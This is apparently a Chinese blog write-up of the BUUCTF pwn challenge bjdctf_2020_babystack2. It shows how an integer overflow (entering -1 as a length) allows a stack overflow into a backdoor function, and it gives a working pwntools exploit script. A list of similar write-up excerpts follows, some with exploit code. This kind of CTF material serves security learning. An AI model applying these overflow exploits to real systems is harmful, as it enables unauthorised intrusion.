BUUCTF Pwn bjdctf_2020_babystack2 题解

最新推荐文章于 2025-04-14 19:18:19 发布
最新推荐文章于 2025-04-14 19:18:19 发布
阅读量330 收藏
点赞数 1
分类专栏: Pwn BUUCTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/144434416
版权

1.下载 checksec

64位 拖入IDA64

定位到main函数 以及后门函数

发现read需要读取输入——nbytes的数字来决定长度

同时nbytes是size_t类型 也就是无符号整型的

所以想到整数溢出漏洞  将nbytes设置为-1就会回绕,变成超大整数 从而实现栈溢出漏洞

exp:

from pwn import *

#p = process('./babystack2')
p = remote("node5.buuoj.cn", 27938)
backdoor = 0x400726

p.sendlineafter(b"your name:", b'-1')
payload = b'a' * (0x10 + 8) + p64(backdoor)
#  +8要双击buf去栈看 看完就知道是要+8了
p.sendlineafter("u name?", payload)
p.interactive()

运行,得到flag

结束。

BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1695
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
BUUCTFbjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 1000
BUUCTFbjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 972
[buuctf]bjdctf_2020_babystack
bjdctf_2020_babystack 1(栈溢出)
最新发布
Snk0xHeart的博客
04-14 231
开虚拟机checksec64位,没开栈保护扔进IDA(64位),找到main,F5反编译没啥东西,点进buf看看(同时注意第8行的nbytes,下面要用到)栈溢出吗?不管了,先数为敬,offset=16-4+8(dq=8)+8-4=24(注:buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出,原本的大小为0,没得读,只有我们为其赋值,我们写入的东西才能让他读(第8行和第18行代码))然后找找后门函数Shift+F12,看看有啥东西可用。
BUUCTF(pwn)bjdctf_2020_babystack
半岛铁盒的博客
03-29 486
from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 425
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
bjdctf_2020_babystackBUUCTF
qq_41696518的博客
08-26 1047
bjdctf_2020_babystack
bjdctf_2020_babystack
m0_52231248的博客
11-07 172
bjdctf_2020_babystack 题目Ubuntu 16 Checksec检查一下 Ida: read函数的读取长度是我们的输入,存在溢出点,offest=0x10+0x8 然后main函数上面就是backdoor函数 构造exp: 成功得到flag:
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1661
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
日行一PWN bjdctf_2020_babystack 尝试动态调试?
m0_57221101的博客
06-02 534
BUUCTF在线评测 (buuoj.cn)还是buu的题,这次没什么好讲的,一道送分题,但是明白了一个道理,不要太相信ida 的伪代码,那玩意的作用是帮你快速看明白题是在干什么,而不是帮你弄清楚做出这道题的细节。尤其是数据长度部分那么直接来分析首先可以看到,只有NX,和部分RELRO保护ida静态分析也是非常干脆的给出了后门程序主函数更是简单,用scanf来输入一个数字,把这个数字作为我们之后再read中的数据MAX大小。而看上面的接收参数只有0x10个大小(看伪代码此处说只有十二个,其实有16个,非常折磨
BUUCTF bjdctf_2020_babystack2
2401_88087539的博客
01-30 177
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 389
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
【CTF】bjdctf_2020_babystack2
凉水的博客
06-30 699
bjdctf_2020_babystack2
[BUUOJ]bjdctf_2020_babystack2
Do1phln的博客
10-25 206
checksec是64位小端序,IDA分析看没找到明显的输入溢出逻辑,但是找到了后门函数,再仔细观察发现数值里面有强制转换,有一部分从int转到了unsigned int,因此可以初步判定为整型溢出,如果我输入-1即可突破长度为10的限制,所以以此下手即可成功修改返回地址,getshell。
BUUCTFbjdctf_2020_babystack2
m0_51251108的博客
12-30 369
BUUCTFbjdctf_2020_babystack2 64位,无canary 有后门函数 这题思路就是用无符号和有符号整型来绕过10的比较 比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1 这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号 所以可以绕过 exp: from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值